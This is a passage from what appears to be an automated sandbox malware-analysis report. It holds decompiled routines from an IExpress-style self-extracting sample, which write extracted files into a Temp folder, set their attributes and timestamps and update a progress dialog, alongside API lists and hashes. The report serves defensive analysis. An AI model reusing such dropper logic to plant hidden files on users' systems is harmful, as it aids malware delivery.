                                                                                                                                                                                                                                            				if( *0xa091d8 == 0) {
                                                                                                                                                                                                                                            					_t32 = _a4;
                                                                                                                                                                                                                                            					__eflags = _t32;
                                                                                                                                                                                                                                            					if(_t32 == 0) {
                                                                                                                                                                                                                                            						_t33 = E00A04E99(_t75);
                                                                                                                                                                                                                                            						L35:
                                                                                                                                                                                                                                            						return E00A06CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t35 = _t32 - 1;
                                                                                                                                                                                                                                            					__eflags = _t35;
                                                                                                                                                                                                                                            					if(_t35 == 0) {
                                                                                                                                                                                                                                            						L9:
                                                                                                                                                                                                                                            						_t33 = 0;
                                                                                                                                                                                                                                            						goto L35;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t36 = _t35 - 1;
                                                                                                                                                                                                                                            					__eflags = _t36;
                                                                                                                                                                                                                                            					if(_t36 == 0) {
                                                                                                                                                                                                                                            						_t37 =  *0xa08584; // 0x0
                                                                                                                                                                                                                                            						__eflags = _t37;
                                                                                                                                                                                                                                            						if(_t37 != 0) {
                                                                                                                                                                                                                                            							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t54 = 0xa091e4;
                                                                                                                                                                                                                                            						_t58 = 0xa091e4;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t38 =  *_t58;
                                                                                                                                                                                                                                            							_t58 =  &(_t58[1]);
                                                                                                                                                                                                                                            							__eflags = _t38;
                                                                                                                                                                                                                                            						} while (_t38 != 0);
                                                                                                                                                                                                                                            						_t59 = _t58 - 0xa091e5;
                                                                                                                                                                                                                                            						__eflags = _t59;
                                                                                                                                                                                                                                            						_t71 =  *(_t75 + 4);
                                                                                                                                                                                                                                            						_t73 =  &(_t71[1]);
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t39 =  *_t71;
                                                                                                                                                                                                                                            							_t71 =  &(_t71[1]);
                                                                                                                                                                                                                                            							__eflags = _t39;
                                                                                                                                                                                                                                            						} while (_t39 != 0);
                                                                                                                                                                                                                                            						_t69 = _t71 - _t73;
                                                                                                                                                                                                                                            						_t30 = _t59 + 1 + _t71 - _t73;
                                                                                                                                                                                                                                            						__eflags = _t30 - 0x104;
                                                                                                                                                                                                                                            						if(_t30 >= 0x104) {
                                                                                                                                                                                                                                            							L3:
                                                                                                                                                                                                                                            							_t33 = _t30 | 0xffffffff;
                                                                                                                                                                                                                                            							goto L35;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t69 = 0xa091e4;
                                                                                                                                                                                                                                            						_t30 = E00A04702( &_v268, 0xa091e4,  *(_t75 + 4));
                                                                                                                                                                                                                                            						__eflags = _t30;
                                                                                                                                                                                                                                            						if(__eflags == 0) {
                                                                                                                                                                                                                                            							goto L3;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t41 = E00A0476D( &_v268, __eflags);
                                                                                                                                                                                                                                            						__eflags = _t41;
                                                                                                                                                                                                                                            						if(_t41 == 0) {
                                                                                                                                                                                                                                            							goto L9;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_push(0x180);
                                                                                                                                                                                                                                            						_t30 = E00A04980( &_v268, 0x8302); // executed
                                                                                                                                                                                                                                            						_t75 = _t30;
                                                                                                                                                                                                                                            						__eflags = _t75 - 0xffffffff;
                                                                                                                                                                                                                                            						if(_t75 == 0xffffffff) {
                                                                                                                                                                                                                                            							goto L3;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t30 = E00A047E0( &_v268);
                                                                                                                                                                                                                                            						__eflags = _t30;
                                                                                                                                                                                                                                            						if(_t30 == 0) {
                                                                                                                                                                                                                                            							goto L3;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						 *0xa093f4 =  *0xa093f4 + 1;
                                                                                                                                                                                                                                            						_t33 = _t75;
                                                                                                                                                                                                                                            						goto L35;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t44 = _t36 - 1;
                                                                                                                                                                                                                                            					__eflags = _t44;
                                                                                                                                                                                                                                            					if(_t44 == 0) {
                                                                                                                                                                                                                                            						_t54 = 0xa091e4;
                                                                                                                                                                                                                                            						_t63 = 0xa091e4;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t45 =  *_t63;
                                                                                                                                                                                                                                            							_t63 =  &(_t63[1]);
                                                                                                                                                                                                                                            							__eflags = _t45;
                                                                                                                                                                                                                                            						} while (_t45 != 0);
                                                                                                                                                                                                                                            						_t74 =  *(_t75 + 4);
                                                                                                                                                                                                                                            						_t64 = _t63 - 0xa091e5;
                                                                                                                                                                                                                                            						__eflags = _t64;
                                                                                                                                                                                                                                            						_t69 =  &(_t74[1]);
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t46 =  *_t74;
                                                                                                                                                                                                                                            							_t74 =  &(_t74[1]);
                                                                                                                                                                                                                                            							__eflags = _t46;
                                                                                                                                                                                                                                            						} while (_t46 != 0);
                                                                                                                                                                                                                                            						_t73 = _t74 - _t69;
                                                                                                                                                                                                                                            						_t30 = _t64 + 1 + _t74 - _t69;
                                                                                                                                                                                                                                            						__eflags = _t30 - 0x104;
                                                                                                                                                                                                                                            						if(_t30 >= 0x104) {
                                                                                                                                                                                                                                            							goto L3;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t69 = 0xa091e4;
                                                                                                                                                                                                                                            						_t30 = E00A04702( &_v268, 0xa091e4,  *(_t75 + 4));
                                                                                                                                                                                                                                            						__eflags = _t30;
                                                                                                                                                                                                                                            						if(_t30 == 0) {
                                                                                                                                                                                                                                            							goto L3;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t69 =  *((intOrPtr*)(_t75 + 0x18));
                                                                                                                                                                                                                                            						_t30 = E00A04C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
                                                                                                                                                                                                                                            						__eflags = _t30;
                                                                                                                                                                                                                                            						if(_t30 == 0) {
                                                                                                                                                                                                                                            							goto L3;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						E00A04B60( *((intOrPtr*)(_t75 + 0x14))); // executed
                                                                                                                                                                                                                                            						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
                                                                                                                                                                                                                                            						__eflags = _t50;
                                                                                                                                                                                                                                            						if(_t50 != 0) {
                                                                                                                                                                                                                                            							_t51 = _t50 & 0x00000027;
                                                                                                                                                                                                                                            							__eflags = _t51;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t51 = 0x80;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t30 = SetFileAttributesA( &_v268, _t51); // executed
                                                                                                                                                                                                                                            						__eflags = _t30;
                                                                                                                                                                                                                                            						if(_t30 == 0) {
                                                                                                                                                                                                                                            							goto L3;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t33 = 1;
                                                                                                                                                                                                                                            							goto L35;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t30 = _t44 - 1;
                                                                                                                                                                                                                                            					__eflags = _t30;
                                                                                                                                                                                                                                            					if(_t30 == 0) {
                                                                                                                                                                                                                                            						goto L3;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L9;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_a4 == 3) {
                                                                                                                                                                                                                                            					_t30 = E00A04B60( *((intOrPtr*)(_t75 + 0x14)));
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				goto L3;
                                                                                                                                                                                                                                            			}































                                                                                                                                                                                                                                            0x00a04cd0
                                                                                                                                                                                                                                            0x00a04cdb
                                                                                                                                                                                                                                            0x00a04ce0
                                                                                                                                                                                                                                            0x00a04ce2
                                                                                                                                                                                                                                            0x00a04cee
                                                                                                                                                                                                                                            0x00a04cf2
                                                                                                                                                                                                                                            0x00a04d0e
                                                                                                                                                                                                                                            0x00a04d0e
                                                                                                                                                                                                                                            0x00a04d11
                                                                                                                                                                                                                                            0x00a04e83
                                                                                                                                                                                                                                            0x00a04e88
                                                                                                                                                                                                                                            0x00a04e98
                                                                                                                                                                                                                                            0x00a04e98
                                                                                                                                                                                                                                            0x00a04d17
                                                                                                                                                                                                                                            0x00a04d17
                                                                                                                                                                                                                                            0x00a04d1a
                                                                                                                                                                                                                                            0x00a04d2f
                                                                                                                                                                                                                                            0x00a04d2f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a04d2f
                                                                                                                                                                                                                                            0x00a04d1c
                                                                                                                                                                                                                                            0x00a04d1c
                                                                                                                                                                                                                                            0x00a04d1f
                                                                                                                                                                                                                                            0x00a04dcb
                                                                                                                                                                                                                                            0x00a04dd0
                                                                                                                                                                                                                                            0x00a04dd2
                                                                                                                                                                                                                                            0x00a04ddd
                                                                                                                                                                                                                                            0x00a04ddd
                                                                                                                                                                                                                                            0x00a04de3
                                                                                                                                                                                                                                            0x00a04de8
                                                                                                                                                                                                                                            0x00a04ded
                                                                                                                                                                                                                                            0x00a04ded
                                                                                                                                                                                                                                            0x00a04def
                                                                                                                                                                                                                                            0x00a04df0
                                                                                                                                                                                                                                            0x00a04df0
                                                                                                                                                                                                                                            0x00a04df4
                                                                                                                                                                                                                                            0x00a04df4
                                                                                                                                                                                                                                            0x00a04df6
                                                                                                                                                                                                                                            0x00a04df9
                                                                                                                                                                                                                                            0x00a04dfc
                                                                                                                                                                                                                                            0x00a04dfc
                                                                                                                                                                                                                                            0x00a04dfe
                                                                                                                                                                                                                                            0x00a04dff
                                                                                                                                                                                                                                            0x00a04dff
                                                                                                                                                                                                                                            0x00a04e03
                                                                                                                                                                                                                                            0x00a04e08
                                                                                                                                                                                                                                            0x00a04e0a
                                                                                                                                                                                                                                            0x00a04e0f
                                                                                                                                                                                                                                            0x00a04d03
                                                                                                                                                                                                                                            0x00a04d03
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a04d03
                                                                                                                                                                                                                                            0x00a04e18
                                                                                                                                                                                                                                            0x00a04e20
                                                                                                                                                                                                                                            0x00a04e25
                                                                                                                                                                                                                                            0x00a04e27
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a04e33
                                                                                                                                                                                                                                            0x00a04e38
                                                                                                                                                                                                                                            0x00a04e3a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a04e40
                                                                                                                                                                                                                                            0x00a04e51
                                                                                                                                                                                                                                            0x00a04e56
                                                                                                                                                                                                                                            0x00a04e5b
                                                                                                                                                                                                                                            0x00a04e5e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a04e6a
                                                                                                                                                                                                                                            0x00a04e6f
                                                                                                                                                                                                                                            0x00a04e71
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a04e77
                                                                                                                                                                                                                                            0x00a04e7d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a04e7d
                                                                                                                                                                                                                                            0x00a04d25
                                                                                                                                                                                                                                            0x00a04d25
                                                                                                                                                                                                                                            0x00a04d28
                                                                                                                                                                                                                                            0x00a04d36
                                                                                                                                                                                                                                            0x00a04d3b
                                                                                                                                                                                                                                            0x00a04d40
                                                                                                                                                                                                                                            0x00a04d40
                                                                                                                                                                                                                                            0x00a04d42
                                                                                                                                                                                                                                            0x00a04d43
                                                                                                                                                                                                                                            0x00a04d43
                                                                                                                                                                                                                                            0x00a04d47
                                                                                                                                                                                                                                            0x00a04d4a
                                                                                                                                                                                                                                            0x00a04d4a
                                                                                                                                                                                                                                            0x00a04d4c
                                                                                                                                                                                                                                            0x00a04d4f
                                                                                                                                                                                                                                            0x00a04d4f
                                                                                                                                                                                                                                            0x00a04d51
                                                                                                                                                                                                                                            0x00a04d52
                                                                                                                                                                                                                                            0x00a04d52
                                                                                                                                                                                                                                            0x00a04d56
                                                                                                                                                                                                                                            0x00a04d5b
                                                                                                                                                                                                                                            0x00a04d5d
                                                                                                                                                                                                                                            0x00a04d62
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a04d67
                                                                                                                                                                                                                                            0x00a04d6f
                                                                                                                                                                                                                                            0x00a04d74
                                                                                                                                                                                                                                            0x00a04d76
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a04d7c
                                                                                                                                                                                                                                            0x00a04d84
                                                                                                                                                                                                                                            0x00a04d89
                                                                                                                                                                                                                                            0x00a04d8b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a04d94
                                                                                                                                                                                                                                            0x00a04d99
                                                                                                                                                                                                                                            0x00a04d9e
                                                                                                                                                                                                                                            0x00a04da1
                                                                                                                                                                                                                                            0x00a04daa
                                                                                                                                                                                                                                            0x00a04daa
                                                                                                                                                                                                                                            0x00a04da3
                                                                                                                                                                                                                                            0x00a04da3
                                                                                                                                                                                                                                            0x00a04da3
                                                                                                                                                                                                                                            0x00a04db5
                                                                                                                                                                                                                                            0x00a04dbb
                                                                                                                                                                                                                                            0x00a04dbd
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a04dc3
                                                                                                                                                                                                                                            0x00a04dc5
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a04dc5
                                                                                                                                                                                                                                            0x00a04dbd
                                                                                                                                                                                                                                            0x00a04d2a
                                                                                                                                                                                                                                            0x00a04d2a
                                                                                                                                                                                                                                            0x00a04d2d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a04d2d
                                                                                                                                                                                                                                            0x00a04cf8
                                                                                                                                                                                                                                            0x00a04cfd
                                                                                                                                                                                                                                            0x00a04d02
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 00A04DB5
                                                                                                                                                                                                                                            • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 00A04DDD
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AttributesFileItemText
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                                                                                                                                                                                            • API String ID: 3625706803-3647970563
                                                                                                                                                                                                                                            • Opcode ID: e85bfd219978de065d579d24c21be9c6446e112cf51db12f1e5ea2e257d59949
                                                                                                                                                                                                                                            • Instruction ID: 03ef0053b40afaa4c08963c398b89880d1bc9137d68ff32d6185080062125b1c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e85bfd219978de065d579d24c21be9c6446e112cf51db12f1e5ea2e257d59949
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9B4124B620020D9BCB219F38FE546F677A5FB4D300F044668EA86972D5DA31DE4AC750
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A04C37(signed int __ecx, int __edx, int _a4) {
                                                                                                                                                                                                                                            				struct _FILETIME _v12;
                                                                                                                                                                                                                                            				struct _FILETIME _v20;
                                                                                                                                                                                                                                            				FILETIME* _t14;
                                                                                                                                                                                                                                            				int _t15;
                                                                                                                                                                                                                                            				signed int _t21;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t21 = __ecx * 0x18;
                                                                                                                                                                                                                                            				if( *((intOrPtr*)(_t21 + 0xa08d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
                                                                                                                                                                                                                                            					L5:
                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t14 =  &_v12;
                                                                                                                                                                                                                                            					_t15 = SetFileTime( *(_t21 + 0xa08d74), _t14, _t14, _t14); // executed
                                                                                                                                                                                                                                            					if(_t15 == 0) {
                                                                                                                                                                                                                                            						goto L5;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}








                                                                                                                                                                                                                                            0x00a04c40
                                                                                                                                                                                                                                            0x00a04c4a
                                                                                                                                                                                                                                            0x00a04c8d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a04c70
                                                                                                                                                                                                                                            0x00a04c70
                                                                                                                                                                                                                                            0x00a04c7e
                                                                                                                                                                                                                                            0x00a04c86
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a04c8a

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • DosDateTimeToFileTime.KERNEL32 ref: 00A04C54
                                                                                                                                                                                                                                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00A04C66
                                                                                                                                                                                                                                            • SetFileTime.KERNELBASE(?,?,?,?), ref: 00A04C7E
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Time$File$DateLocal
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2071732420-0
                                                                                                                                                                                                                                            • Opcode ID: 9b120f79ce121de6e9554e6deebcfe812d11d24364f90f25028b2212c938ad07
                                                                                                                                                                                                                                            • Instruction ID: 49f3f1efc5e256133bf1039cb6e862d3181fb203f703783649c54d426df96276
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9b120f79ce121de6e9554e6deebcfe812d11d24364f90f25028b2212c938ad07
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6DF090B260120CAFEB64DFB4DC48DBB77ACFB18340B44462EAA16C10D0EA30D915C7A4
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 75%
                                                                                                                                                                                                                                            			E00A0487A(CHAR* __ecx, signed int __edx) {
                                                                                                                                                                                                                                            				void* _t7;
                                                                                                                                                                                                                                            				CHAR* _t11;
                                                                                                                                                                                                                                            				long _t18;
                                                                                                                                                                                                                                            				long _t23;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t11 = __ecx;
                                                                                                                                                                                                                                            				asm("sbb edi, edi");
                                                                                                                                                                                                                                            				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
                                                                                                                                                                                                                                            				if((__edx & 0x00000100) == 0) {
                                                                                                                                                                                                                                            					asm("sbb esi, esi");
                                                                                                                                                                                                                                            					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					if((__edx & 0x00000400) == 0) {
                                                                                                                                                                                                                                            						asm("sbb esi, esi");
                                                                                                                                                                                                                                            						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t23 = 1;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
                                                                                                                                                                                                                                            				if(_t7 != 0xffffffff || _t23 == 3) {
                                                                                                                                                                                                                                            					return _t7;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					E00A0490C(_t11);
                                                                                                                                                                                                                                            					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}







                                                                                                                                                                                                                                            0x00a04880
                                                                                                                                                                                                                                            0x00a0488c
                                                                                                                                                                                                                                            0x00a04894
                                                                                                                                                                                                                                            0x00a048a0
                                                                                                                                                                                                                                            0x00a048c9
                                                                                                                                                                                                                                            0x00a048ce
                                                                                                                                                                                                                                            0x00a048a2
                                                                                                                                                                                                                                            0x00a048a8
                                                                                                                                                                                                                                            0x00a048b7
                                                                                                                                                                                                                                            0x00a048bc
                                                                                                                                                                                                                                            0x00a048aa
                                                                                                                                                                                                                                            0x00a048ac
                                                                                                                                                                                                                                            0x00a048ac
                                                                                                                                                                                                                                            0x00a048a8
                                                                                                                                                                                                                                            0x00a048de
                                                                                                                                                                                                                                            0x00a048e7
                                                                                                                                                                                                                                            0x00a0490b
                                                                                                                                                                                                                                            0x00a048ee
                                                                                                                                                                                                                                            0x00a048f0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a04902

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,00A04A23,?,00A04F67,*MEMCAB,00008000,00000180), ref: 00A048DE
                                                                                                                                                                                                                                            • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,00A04F67,*MEMCAB,00008000,00000180), ref: 00A04902
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                                                                                                            • Opcode ID: ac0f5c3a0520e3bf634ccbf5d0e3c8c9cb974524a586f3c209661174e4703a6c
                                                                                                                                                                                                                                            • Instruction ID: 55a3f53f6cdcd018cf44c3dcc6b8ffe1217915edc45c49e2080b5644490b935a
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ac0f5c3a0520e3bf634ccbf5d0e3c8c9cb974524a586f3c209661174e4703a6c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 83018BE3E116382AF32481686C88FB7451CEB9A730F1B4730BEAAE71C2D1644C0581E0
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                                                                            			E00A04AD0(signed int _a4, void* _a8, long _a12) {
                                                                                                                                                                                                                                            				signed int _t9;
                                                                                                                                                                                                                                            				int _t12;
                                                                                                                                                                                                                                            				signed int _t14;
                                                                                                                                                                                                                                            				signed int _t15;
                                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                                            				struct HWND__* _t21;
                                                                                                                                                                                                                                            				signed int _t24;
                                                                                                                                                                                                                                            				signed int _t25;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t20 =  *0xa0858c; // 0xb8
                                                                                                                                                                                                                                            				_t9 = E00A03680(_t20);
                                                                                                                                                                                                                                            				if( *0xa091d8 == 0) {
                                                                                                                                                                                                                                            					_push(_t24);
                                                                                                                                                                                                                                            					_t12 = WriteFile( *(0xa08d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
                                                                                                                                                                                                                                            					if(_t12 != 0) {
                                                                                                                                                                                                                                            						_t25 = _a12;
                                                                                                                                                                                                                                            						if(_t25 != 0xffffffff) {
                                                                                                                                                                                                                                            							_t14 =  *0xa09400; // 0xa4a00
                                                                                                                                                                                                                                            							_t15 = _t14 + _t25;
                                                                                                                                                                                                                                            							 *0xa09400 = _t15;
                                                                                                                                                                                                                                            							if( *0xa08184 != 0) {
                                                                                                                                                                                                                                            								_t21 =  *0xa08584; // 0x0
                                                                                                                                                                                                                                            								if(_t21 != 0) {
                                                                                                                                                                                                                                            									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0xa093f8, 0);
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t25 = _t24 | 0xffffffff;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					return _t25;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					return _t9 | 0xffffffff;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}











                                                                                                                                                                                                                                            0x00a04ad5
                                                                                                                                                                                                                                            0x00a04adb
                                                                                                                                                                                                                                            0x00a04ae7
                                                                                                                                                                                                                                            0x00a04aee
                                                                                                                                                                                                                                            0x00a04b05
                                                                                                                                                                                                                                            0x00a04b0d
                                                                                                                                                                                                                                            0x00a04b14
                                                                                                                                                                                                                                            0x00a04b1a
                                                                                                                                                                                                                                            0x00a04b1c
                                                                                                                                                                                                                                            0x00a04b21
                                                                                                                                                                                                                                            0x00a04b2a
                                                                                                                                                                                                                                            0x00a04b2f
                                                                                                                                                                                                                                            0x00a04b31
                                                                                                                                                                                                                                            0x00a04b39
                                                                                                                                                                                                                                            0x00a04b54
                                                                                                                                                                                                                                            0x00a04b54
                                                                                                                                                                                                                                            0x00a04b39
                                                                                                                                                                                                                                            0x00a04b2f
                                                                                                                                                                                                                                            0x00a04b0f
                                                                                                                                                                                                                                            0x00a04b0f
                                                                                                                                                                                                                                            0x00a04b0f
                                                                                                                                                                                                                                            0x00a04b5e
                                                                                                                                                                                                                                            0x00a04ae9
                                                                                                                                                                                                                                            0x00a04aed
                                                                                                                                                                                                                                            0x00a04aed

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00A03680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00A0369F
                                                                                                                                                                                                                                              • Part of subcall function 00A03680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00A036B2
                                                                                                                                                                                                                                              • Part of subcall function 00A03680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00A036DA
                                                                                                                                                                                                                                            • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00A04B05
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmpDownload File
